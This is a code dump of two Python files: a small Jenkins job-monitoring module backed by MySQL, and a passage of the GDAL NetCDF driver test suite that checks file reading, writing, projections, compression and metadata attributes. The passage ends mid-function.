jenkins_monitor.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import json
import requests
from datetime import datetime
import pymysql
import csv
import codecs
import time
import threading
from abc import abstractmethod
from mysql import Pymysql
from jenkins_common import JenkinsJob
# pylint: disable=E0401
root = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..')
sys.path.insert(0, root)
from common.logger import logger
class DataInterface(object):
'''
A interface for communicating data between Jenkins and backends (e.g.: database)
Jenkins will call these method, and a backend should implete the interface.
'''
@abstractmethod
def require_data(self, type=None, **kwargs):
'''
params:
type: data type, a concrete monitor task use this type to require data
'''
raise NotImplementedError
@abstractmethod
def publish_result(self, data, **kwargs):
raise NotImplementedError
class JenkinsMonitorTbl(object):
'''
Jenkins monitor table
items format: ((url_1, user_1, passwd_1, job_1), (url_2, user_2, passwd_2, job_2),)
'''
def __init__(self, task_name=None):
self.db = Pymysql()
# ((jenkins_id, jobs_id),)
self.monitor_task = self._retrieve_data(task_name)
def _retrieve_data(self, task_name):
sql = "SELECT jenkins.url, jenkins.user, jenkins.passwd, job.job \
FROM crt_jenkins_monitor AS m, crt_jenkins_info AS jenkins, crt_jenkins_job AS job \
WHERE m.jenkins_id = jenkins.id AND m.job_id = job.id"
if task_name:
sql += r" and task = '{}'".format(task_name)
logger.debug(sql)
monitor_task = self.db.get_DB(sql)
logger.debug(monitor_task)
return monitor_task
@property
def items(self):
return self.monitor_task
class JenkinsMonitorTask(object):
'''
A common task for Jenkins jobs monitoring
A concrete task should inherit the task and implete the process method
Attributes:
url: Jenkins URL, such as 'http://1.1.1.1:8080"
user: Jenkins user
passwd: Jenkins password
impl: A bcakend, which should implete the methods of DataInterface
'''
def __init__(self, url, user, passwd, job_name, impl):
self.url = url
self.job_name = job_name
self.jenkins = JenkinsJob(url, user, passwd, job_name)
self.impl = impl
@abstractmethod
def process(self):
raise NotImplementedError
def run(self):
result = self.process()
ret = self.impl.publish_result(result, self.url, self.job_name)
return ret
class JenkinsMonitorManager(object):
'''
A manager for jenkins jobs monitoring, it brings all monitoring tasks up.
It takes a simple thread mode, each task was ran on a thread, the manager
will wait until all threads get done. If there are a lot of tasks, it's better
using thread pool mode instead this mode.
'''
def __init__(self, tasks):
# init jenkins and jobs
self.tasks = tasks
self.thread_list = []
def run(self):
# for each task, start a thread
for task in self.tasks:
self.thread_list.append(threading.Thread(target=task.run))
# start all sub-threads terminate
logger.info("tasks began.")
for td in self.thread_list:
td.start()
# wait all sub-threads terminate
for td in self.thread_list:
td.join()
logger.info("tasks done.")
if __name__ == '__main__':
pass
|
netcdf.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test NetCDF driver support.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2007, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2008-2016, Even Rouault <even.rouault at spatialys.com>
# Copyright (c) 2010, Kyle Shannon <kyle at pobox dot com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import sys
import shutil
import struct
from osgeo import gdal
from osgeo import ogr
from osgeo import osr
sys.path.append( '../pymod' )
import gdaltest
import test_cli_utilities
###############################################################################
# Netcdf Functions
###############################################################################
###############################################################################
# Get netcdf version and test for supported files
def netcdf_setup():
gdaltest.netcdf_drv_version = 'unknown'
gdaltest.netcdf_drv_has_nc2 = False
gdaltest.netcdf_drv_has_nc4 = False
gdaltest.netcdf_drv_has_hdf4 = False
gdaltest.netcdf_drv_silent = False
gdaltest.netcdf_drv = gdal.GetDriverByName( 'NETCDF' )
if gdaltest.netcdf_drv is None:
print('NOTICE: netcdf not supported, skipping checks')
return 'skip'
#get capabilities from driver
metadata = gdaltest.netcdf_drv.GetMetadata()
if metadata is None:
print('NOTICE: netcdf metadata not found, skipping checks')
return 'skip'
#netcdf library version "3.6.3" of Dec 22 2009 06:10:17 $
#netcdf library version 4.1.1 of Mar 4 2011 12:52:19 $
if 'NETCDF_VERSION' in metadata:
v = metadata['NETCDF_VERSION']
v = v[ 0 : v.find(' ') ].strip('"')
gdaltest.netcdf_drv_version = v
if 'NETCDF_HAS_NC2' in metadata \
and metadata['NETCDF_HAS_NC2'] == 'YES':
gdaltest.netcdf_drv_has_nc2 = True
if 'NETCDF_HAS_NC4' in metadata \
and metadata['NETCDF_HAS_NC4'] == 'YES':
gdaltest.netcdf_drv_has_nc4 = True
if 'NETCDF_HAS_HDF4' in metadata \
and metadata['NETCDF_HAS_HDF4'] == 'YES':
gdaltest.netcdf_drv_has_hdf4 = True
print( 'NOTICE: using netcdf version ' + gdaltest.netcdf_drv_version + \
' has_nc2: '+str(gdaltest.netcdf_drv_has_nc2)+' has_nc4: ' + \
str(gdaltest.netcdf_drv_has_nc4) )
return 'success'
###############################################################################
# test file copy
# helper function needed so we can call Process() on it from netcdf_test_copy_timeout()
def netcdf_test_copy( ifile, band, checksum, ofile, opts=[], driver='NETCDF' ):
test = gdaltest.GDALTest( 'NETCDF', '../'+ifile, band, checksum, options=opts )
return test.testCreateCopy(check_gt=0, check_srs=0, new_filename=ofile, delete_copy = 0, check_minmax = 0)
###############################################################################
#test file copy, optional timeout arg
def netcdf_test_copy_timeout( ifile, band, checksum, ofile, opts=[], driver='NETCDF', timeout=None ):
from multiprocessing import Process
result = 'success'
drv = gdal.GetDriverByName( driver )
if os.path.exists( ofile ):
drv.Delete( ofile )
if timeout is None:
result = netcdf_test_copy( ifile, band, checksum, ofile, opts, driver )
else:
sys.stdout.write('.')
sys.stdout.flush()
proc = Process( target=netcdf_test_copy, args=(ifile, band, checksum, ofile, opts ) )
proc.start()
proc.join( timeout )
# if proc is alive after timeout we must terminate it, and return fail
# valgrind detects memory leaks when this occurs (although it should never happen)
if proc.is_alive():
proc.terminate()
if os.path.exists( ofile ):
drv.Delete( ofile )
print('testCreateCopy() for file %s has reached timeout limit of %d seconds' % (ofile, timeout) )
result = 'fail'
return result
###############################################################################
#check support for DEFLATE compression, requires HDF5 and zlib
def netcdf_test_deflate( ifile, checksum, zlevel=1, timeout=None ):
try:
from multiprocessing import Process
Process.is_alive
except:
print('from multiprocessing import Process failed')
return 'skip'
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
ofile1 = 'tmp/' + os.path.basename(ifile) + '-1.nc'
ofile1_opts = [ 'FORMAT=NC4C', 'COMPRESS=NONE']
ofile2 = 'tmp/' + os.path.basename(ifile) + '-2.nc'
ofile2_opts = [ 'FORMAT=NC4C', 'COMPRESS=DEFLATE', 'ZLEVEL='+str(zlevel) ]
if not os.path.exists( ifile ):
gdaltest.post_reason( 'ifile %s does not exist' % ifile )
return 'fail'
result1 = netcdf_test_copy_timeout( ifile, 1, checksum, ofile1, ofile1_opts, 'NETCDF', timeout )
result2 = netcdf_test_copy_timeout( ifile, 1, checksum, ofile2, ofile2_opts, 'NETCDF', timeout )
if result1 == 'fail' or result2 == 'fail':
return 'fail'
# make sure compressed file is smaller than uncompressed files
try:
size1 = os.path.getsize( ofile1 )
size2 = os.path.getsize( ofile2 )
except:
gdaltest.post_reason( 'Error getting file sizes.' )
return 'fail'
if size2 >= size1:
gdaltest.post_reason( 'Compressed file is not smaller than reference, check your netcdf-4, HDF5 and zlib installation' )
return 'fail'
return 'success'
###############################################################################
# check support for reading attributes (single values and array values)
def netcdf_check_vars( ifile, vals_global=None, vals_band=None ):
src_ds = gdal.Open( ifile )
if src_ds is None:
gdaltest.post_reason( 'could not open dataset ' + ifile )
return 'fail'
metadata_global = src_ds.GetMetadata()
if metadata_global is None:
gdaltest.post_reason( 'could not get global metadata from ' + ifile )
return 'fail'
missval = src_ds.GetRasterBand(1).GetNoDataValue()
if missval != 1:
gdaltest.post_reason( 'got invalid nodata value %s for Band' % str(missval) )
return 'fail'
metadata_band = src_ds.GetRasterBand(1).GetMetadata()
if metadata_band is None:
gdaltest.post_reason( 'could not get Band metadata' )
return 'fail'
metadata = metadata_global
vals = vals_global
if vals is None:
vals = dict()
for k, v in vals.items():
if not k in metadata:
gdaltest.post_reason("missing metadata [%s]" % (str(k)))
return 'fail'
# strip { and } as new driver uses these for array values
mk = metadata[k].lstrip('{ ').rstrip('} ')
if mk != v:
gdaltest.post_reason("invalid value [%s] for metadata [%s]=[%s]" \
% (str(mk),str(k),str(v)))
return 'fail'
metadata = metadata_band
vals = vals_band
if vals is None:
vals = dict()
for k, v in vals.items():
if not k in metadata:
gdaltest.post_reason("missing metadata [%s]" % (str(k)))
return 'fail'
# strip { and } as new driver uses these for array values
mk = metadata[k].lstrip('{ ').rstrip('} ')
if mk != v:
gdaltest.post_reason("invalid value [%s] for metadata [%s]=[%s]" \
% (str(mk),str(k),str(v)))
return 'fail'
return 'success'
###############################################################################
# Netcdf Tests
###############################################################################
###############################################################################
# Perform simple read test.
def netcdf_1():
#setup netcdf environment
netcdf_setup()
if gdaltest.netcdf_drv is None:
return 'skip'
tst = gdaltest.GDALTest( 'NetCDF', 'NETCDF:"data/bug636.nc":tas', 1, 31621,
filename_absolute = 1 )
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
result = tst.testOpen()
gdal.PopErrorHandler()
return result
###############################################################################
# Verify a simple createcopy operation. We can't do the trivial gdaltest
# operation because the new file will only be accessible via subdatasets.
def netcdf_2():
if gdaltest.netcdf_drv is None:
return 'skip'
src_ds = gdal.Open( 'data/byte.tif' )
gdaltest.netcdf_drv.CreateCopy( 'tmp/netcdf2.nc', src_ds)
tst = gdaltest.GDALTest( 'NetCDF', 'tmp/netcdf2.nc',
1, 4672,
filename_absolute = 1 )
wkt = """PROJCS["NAD27 / UTM zone 11N",
GEOGCS["NAD27",
DATUM["North_American_Datum_1927",
SPHEROID["Clarke 1866",6378206.4,294.9786982139006,
AUTHORITY["EPSG","7008"]],
AUTHORITY["EPSG","6267"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4267"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",-117],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AUTHORITY["EPSG","26711"]]"""
result = tst.testOpen( check_prj = wkt )
if result != 'success':
return result
# Test that in raster-only mode, update isn't supported (not sure what would be missing for that...)
with gdaltest.error_handler():
ds = gdal.Open( 'tmp/netcdf2.nc', gdal.GA_Update )
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
gdaltest.clean_tmp()
return 'success'
###############################################################################
def netcdf_3():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/sombrero.grd' )
bnd = ds.GetRasterBand(1)
minmax = bnd.ComputeRasterMinMax()
if abs(minmax[0] - (-0.675758)) > 0.000001 or abs(minmax[1] - 1.0) > 0.000001:
gdaltest.post_reason( 'Wrong min or max.' )
return 'fail'
bnd = None
ds = None
return 'success'
###############################################################################
# In #2582 5dimensional files were causing problems. Verify use ok.
def netcdf_4():
if gdaltest.netcdf_drv is None:
return 'skip'
tst = gdaltest.GDALTest( 'NetCDF',
'NETCDF:data/foo_5dimensional.nc:temperature',
3, 1218, filename_absolute = 1 )
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
#don't test for checksum (see bug #4284)
result = tst.testOpen(skip_checksum = True)
gdal.PopErrorHandler()
return result
###############################################################################
# In #2583 5dimensional files were having problems unrolling the highest
# dimension - check handling now on band 7.
def netcdf_5():
if gdaltest.netcdf_drv is None:
return 'skip'
tst = gdaltest.GDALTest( 'NetCDF',
'NETCDF:data/foo_5dimensional.nc:temperature',
7, 1227, filename_absolute = 1 )
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
#don't test for checksum (see bug #4284)
result = tst.testOpen(skip_checksum = True)
gdal.PopErrorHandler()
return result
###############################################################################
#ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
#1 standard parallel.
def netcdf_6():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_lcc1sp.nc' )
prj = ds.GetProjection( )
sr = osr.SpatialReference( )
sr.ImportFromWkt( prj )
lat_origin = sr.GetProjParm( 'latitude_of_origin' )
if lat_origin != 25:
gdaltest.post_reason( 'Latitude of origin does not match expected:\n%f'
% lat_origin )
return 'fail'
ds = None
return 'success'
###############################################################################
#ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
#2 standard parallels.
def netcdf_7():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_lcc2sp.nc' )
prj = ds.GetProjection( )
sr = osr.SpatialReference( )
sr.ImportFromWkt( prj )
std_p1 = sr.GetProjParm( 'standard_parallel_1' )
std_p2 = sr.GetProjParm( 'standard_parallel_2' )
if std_p1 != 33.0 or std_p2 != 45.0:
gdaltest.post_reason( 'Standard Parallels do not match expected:\n%f,%f'
% ( std_p1, std_p2 ) )
return 'fail'
ds = None
sr = None
return 'success'
###############################################################################
#check for cf convention read of albers equal area
# Previous version compared entire wkt, which varies slightly among driver versions
# now just look for PROJECTION=Albers_Conic_Equal_Area and some parameters
def netcdf_8():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_aea2sp_invf.nc' )
srs = osr.SpatialReference( )
srs.ImportFromWkt( ds.GetProjection( ) )
proj = srs.GetAttrValue( 'PROJECTION' )
if proj != 'Albers_Conic_Equal_Area':
gdaltest.post_reason( 'Projection does not match expected : ' + proj )
return 'fail'
param = srs.GetProjParm('latitude_of_center')
if param != 37.5:
gdaltest.post_reason( 'Got wrong parameter value (%g)' % param )
return 'fail'
param = srs.GetProjParm('longitude_of_center')
if param != -96:
gdaltest.post_reason( 'Got wrong parameter value (%g)' % param )
return 'fail'
ds = None
return 'success'
###############################################################################
#check to see if projected systems default to wgs84 if no spheroid def
def netcdf_9():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_no_sphere.nc' )
prj = ds.GetProjection( )
sr = osr.SpatialReference( )
sr.ImportFromWkt( prj )
spheroid = sr.GetAttrValue( 'SPHEROID' )
if spheroid != 'WGS 84':
gdaltest.post_reason( 'Incorrect spheroid read from file\n%s'
% ( spheroid ) )
return 'fail'
ds = None
sr = None
return 'success'
###############################################################################
#check if km pixel size makes it through to gt
def netcdf_10():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_no_sphere.nc' )
prj = ds.GetProjection( )
gt = ds.GetGeoTransform( )
gt1 = ( -1897186.0290038721, 5079.3608398440065,
0.0,2674684.0244560046,
0.0,-5079.4721679684635 )
gt2 = ( -1897.186029003872, 5.079360839844003,
0.0, 2674.6840244560044,
0.0,-5.079472167968456 )
if gt != gt1:
sr = osr.SpatialReference()
sr.ImportFromWkt( prj )
#new driver uses UNIT vattribute instead of scaling values
if not (sr.GetAttrValue("PROJCS|UNIT",1)=="1000" and gt == gt2) :
gdaltest.post_reason( 'Incorrect geotransform, got '+str(gt) )
return 'fail'
ds = None
return 'success'
###############################################################################
#check if ll gets caught in km pixel size check
def netcdf_11():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/cf_geog.nc' )
gt = ds.GetGeoTransform( )
if gt != (-0.5, 1.0, 0.0, 10.5, 0.0, -1.0):
gdaltest.post_reason( 'Incorrect geotransform' )
return 'fail'
ds = None
return 'success'
###############################################################################
#check for scale/offset set/get.
def netcdf_12():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/scale_offset.nc' )
scale = ds.GetRasterBand( 1 ).GetScale()
offset = ds.GetRasterBand( 1 ).GetOffset()
if scale != 0.01 or offset != 1.5:
gdaltest.post_reason( 'Incorrect scale(%f) or offset(%f)' % ( scale, offset ) )
return 'fail'
ds = None
return 'success'
###############################################################################
#check for scale/offset = None if no scale or offset is available
def netcdf_13():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'data/no_scale_offset.nc' )
scale = ds.GetRasterBand( 1 ).GetScale()
offset = ds.GetRasterBand( 1 ).GetOffset()
if scale != None or offset != None:
gdaltest.post_reason( 'Incorrect scale or offset' )
return 'fail'
ds = None
return 'success'
###############################################################################
#check for scale/offset for two variables
def netcdf_14():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open( 'NETCDF:data/two_vars_scale_offset.nc:z' )
scale = ds.GetRasterBand( 1 ).GetScale()
offset = ds.GetRasterBand( 1 ).GetOffset()
if scale != 0.01 or offset != 1.5:
gdaltest.post_reason( 'Incorrect scale(%f) or offset(%f)' % ( scale, offset ) )
return 'fail'
ds = None
ds = gdal.Open( 'NETCDF:data/two_vars_scale_offset.nc:q' )
scale = ds.GetRasterBand( 1 ).GetScale()
offset = ds.GetRasterBand( 1 ).GetOffset()
scale = ds.GetRasterBand( 1 ).GetScale()
offset = ds.GetRasterBand( 1 ).GetOffset()
if scale != 0.1 or offset != 2.5:
gdaltest.post_reason( 'Incorrect scale(%f) or offset(%f)' % ( scale, offset ) )
return 'fail'
return 'success'
###############################################################################
#check support for netcdf-2 (64 bit)
# This test fails in 1.8.1, because the driver does not support NC2 (bug #3890)
def netcdf_15():
if gdaltest.netcdf_drv is None:
return 'skip'
if gdaltest.netcdf_drv_has_nc2:
ds = gdal.Open( 'data/trmm-nc2.nc' )
if ds is None:
return 'fail'
else:
ds = None
return 'success'
else:
return 'skip'
return 'success'
###############################################################################
#check support for netcdf-4
def netcdf_16():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/trmm-nc4.nc'
if gdaltest.netcdf_drv_has_nc4:
# test with Open()
ds = gdal.Open( ifile )
if ds is None:
gdaltest.post_reason('GDAL did not open file')
return 'fail'
else:
name = ds.GetDriver().GetDescription()
ds = None
#return fail if did not open with the netCDF driver (i.e. HDF5Image)
if name != 'netCDF':
gdaltest.post_reason('netcdf driver did not open file')
return 'fail'
# test with Identify()
name = gdal.IdentifyDriver( ifile ).GetDescription()
if name != 'netCDF':
gdaltest.post_reason('netcdf driver did not identify file')
return 'fail'
else:
return 'skip'
return 'success'
###############################################################################
#check support for netcdf-4 - make sure hdf5 is not read by netcdf driver
def netcdf_17():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/groups.h5'
#skip test if Hdf5 is not enabled
if gdal.GetDriverByName( 'HDF5' ) is None and \
gdal.GetDriverByName( 'HDF5Image' ) is None:
return 'skip'
if gdaltest.netcdf_drv_has_nc4:
#test with Open()
ds = gdal.Open( ifile )
if ds is None:
gdaltest.post_reason('GDAL did not open hdf5 file')
return 'fail'
else:
name = ds.GetDriver().GetDescription()
ds = None
#return fail if opened with the netCDF driver
if name == 'netCDF':
gdaltest.post_reason('netcdf driver opened hdf5 file')
return 'fail'
# test with Identify()
name = gdal.IdentifyDriver( ifile ).GetDescription()
if name == 'netCDF':
gdaltest.post_reason('netcdf driver was identified for hdf5 file')
return 'fail'
else:
return 'skip'
return 'success'
###############################################################################
#check support for netcdf-4 classic (NC4C)
def netcdf_18():
if gdaltest.netcdf_drv is None:
return 'skip'
ifile = 'data/trmm-nc4c.nc'
if gdaltest.netcdf_drv_has_nc4:
# test with Open()
ds = gdal.Open( ifile )
if ds is None:
return 'fail'
else:
name = ds.GetDriver().GetDescription()
ds = None
#return fail if did not open with the netCDF driver (i.e. HDF5Image)
if name != 'netCDF':
return 'fail'
# test with Identify()
name = gdal.IdentifyDriver( ifile ).GetDescription()
if name != 'netCDF':
return 'fail'
else:
return 'skip'
return 'success'
###############################################################################
#check support for reading with DEFLATE compression, requires NC4
def netcdf_19():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
tst = gdaltest.GDALTest( 'NetCDF', 'data/trmm-nc4z.nc', 1, 50235,
filename_absolute = 1 )
result = tst.testOpen(skip_checksum = True)
return result
###############################################################################
#check support for writing with DEFLATE compression, requires NC4
def netcdf_20():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
#simple test with tiny file
return netcdf_test_deflate( 'data/utm.tif', 50235 )
###############################################################################
#check support for writing large file with DEFLATE compression
#if chunking is not defined properly within the netcdf driver, this test can take 1h
def netcdf_21():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
if not gdaltest.run_slow_tests():
return 'skip'
bigfile = 'tmp/cache/utm-big.tif'
sys.stdout.write('.')
sys.stdout.flush()
#create cache dir if absent
if not os.path.exists( 'tmp/cache' ):
os.mkdir( 'tmp/cache' )
#look for large gtiff in cache
if not os.path.exists( bigfile ):
#create large gtiff
if test_cli_utilities.get_gdalwarp_path() is None:
gdaltest.post_reason('gdalwarp not found')
return 'skip'
warp_cmd = test_cli_utilities.get_gdalwarp_path() +\
' -q -overwrite -r bilinear -ts 7680 7680 -of gtiff ' +\
'data/utm.tif ' + bigfile
try:
(ret, err) = gdaltest.runexternal_out_and_err( warp_cmd )
except:
gdaltest.post_reason('gdalwarp execution failed')
return 'fail'
if ( err != '' or ret != '' ):
gdaltest.post_reason('gdalwarp returned error\n'+str(ret)+' '+str(err))
return 'fail'
# test compression of the file, with a conservative timeout of 60 seconds
return netcdf_test_deflate( bigfile, 26695, 6, 60 )
###############################################################################
#check support for hdf4
def netcdf_22():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_hdf4:
return 'skip'
ifile = 'data/hdifftst2.hdf'
#suppress warning
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
ds = gdal.Open( 'NETCDF:' + ifile )
gdal.PopErrorHandler()
if ds is None:
gdaltest.post_reason('netcdf driver did not open hdf4 file')
return 'fail'
else:
ds = None
return 'success'
###############################################################################
#check support for hdf4 - make sure hdf4 file is not read by netcdf driver
def netcdf_23():
#don't skip if netcdf is not enabled in GDAL
#if gdaltest.netcdf_drv is None:
# return 'skip'
#if not gdaltest.netcdf_drv_has_hdf4:
# return 'skip'
#skip test if Hdf4 is not enabled in GDAL
if gdal.GetDriverByName( 'HDF4' ) is None and \
gdal.GetDriverByName( 'HDF4Image' ) is None:
return 'skip'
ifile = 'data/hdifftst2.hdf'
#test with Open()
ds = gdal.Open( ifile )
if ds is None:
gdaltest.post_reason('GDAL did not open hdf4 file')
return 'fail'
else:
name = ds.GetDriver().GetDescription()
ds = None
#return fail if opened with the netCDF driver
if name == 'netCDF':
gdaltest.post_reason('netcdf driver opened hdf4 file')
return 'fail'
# test with Identify()
name = gdal.IdentifyDriver( ifile ).GetDescription()
if name == 'netCDF':
gdaltest.post_reason('netcdf driver was identified for hdf4 file')
return 'fail'
return 'success'
###############################################################################
# check support for reading attributes (single values and array values)
def netcdf_24():
if gdaltest.netcdf_drv is None:
return 'skip'
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '1'}
vals_band = {'_Unsigned': 'true',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556',
'valid_range_s': '0,255'}
return netcdf_check_vars( 'data/nc_vars.nc', vals_global, vals_band )
###############################################################################
# check support for NC4 reading attributes (single values and array values)
def netcdf_24_nc4():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#test_string': 'testval_string',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '-100',
'NC_GLOBAL#test_ub': '200',
'NC_GLOBAL#test_s': '-16000',
'NC_GLOBAL#test_us': '32000',
'NC_GLOBAL#test_l': '-2000000000',
'NC_GLOBAL#test_ul': '4000000000'}
vals_band = {'test_string_arr': 'test,string,arr',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_ub': '1,200',
'valid_range_s': '0,255',
'valid_range_us': '0,32000',
'valid_range_l': '0,255',
'valid_range_ul': '0,4000000000',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556',
'valid_range_s': '0,255'}
return netcdf_check_vars( 'data/nc4_vars.nc', vals_global, vals_band )
###############################################################################
# check support for writing attributes (single values and array values)
def netcdf_25():
if gdaltest.netcdf_drv is None:
return 'skip'
result = netcdf_test_copy( 'data/nc_vars.nc', 1, None, 'tmp/netcdf_25.nc' )
if result != 'success':
return result
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '1'}
vals_band = {'_Unsigned': 'true',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556',
'valid_range_s': '0,255'}
return netcdf_check_vars( 'tmp/netcdf_25.nc', vals_global, vals_band )
###############################################################################
# check support for NC4 writing attributes (single values and array values)
def netcdf_25_nc4():
if gdaltest.netcdf_drv is None:
return 'skip'
if not gdaltest.netcdf_drv_has_nc4:
return 'skip'
result = netcdf_test_copy( 'data/nc4_vars.nc', 1, None, 'tmp/netcdf_25_nc4.nc', [ 'FORMAT=NC4' ] )
if result != 'success':
return result
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#test_string': 'testval_string',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '-100',
'NC_GLOBAL#test_ub': '200',
'NC_GLOBAL#test_s': '-16000',
'NC_GLOBAL#test_us': '32000',
'NC_GLOBAL#test_l': '-2000000000',
'NC_GLOBAL#test_ul': '4000000000'}
vals_band = {'test_string_arr': 'test,string,arr',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_ub': '1,200',
'valid_range_s': '0,255',
'valid_range_us': '0,32000',
'valid_range_l': '0,255',
'valid_range_ul': '0,4000000000',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556',
'valid_range_s': '0,255'}
return netcdf_check_vars( 'tmp/netcdf_25_nc4.nc', vals_global, vals_band )
###############################################################################
# check support for WRITE_BOTTOMUP file creation option
# use a dummy file with no lon/lat info to force a different checksum
# depending on y-axis order
def netcdf_26():
if gdaltest.netcdf_drv is None:
return 'skip'
#test default config
test = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4672 )
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
result = test.testCreateCopy(check_gt=0, check_srs=0, check_minmax = 0)
gdal.PopErrorHandler()
if result != 'success':
print('failed create copy without WRITE_BOTTOMUP')
return result
#test WRITE_BOTTOMUP=NO
test = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4855,
options=['WRITE_BOTTOMUP=NO'] )
result = test.testCreateCopy(check_gt=0, check_srs=0, check_minmax = 0)
if result != 'success':
print('failed create copy with WRITE_BOTTOMUP=NO')
return result
return 'success'
###############################################################################
# check support for GDAL_NETCDF_BOTTOMUP configuration option
def netcdf_27():
if gdaltest.netcdf_drv is None:
return 'skip'
#test default config
test = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4672 )
config_bak = gdal.GetConfigOption( 'GDAL_NETCDF_BOTTOMUP' )
gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', None )
result = test.testOpen()
gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', config_bak )
if result != 'success':
print('failed open without GDAL_NETCDF_BOTTOMUP')
return result
#test GDAL_NETCDF_BOTTOMUP=NO
test = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4855 )
config_bak = gdal.GetConfigOption( 'GDAL_NETCDF_BOTTOMUP' )
gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', 'NO' )
result = test.testOpen()
gdal.SetConfigOption( 'GDAL_NETCDF_BOTTOMUP', config_bak )
if result != 'success':
print('failed open with GDAL_NETCDF_BOTTOMUP')
return result
return 'success'
###############################################################################
# check support for writing multi-dimensional files (helper function)
def netcdf_test_4dfile( ofile ):
# test result file has 8 bands and 0 subdasets (instead of 0 bands and 8 subdatasets)
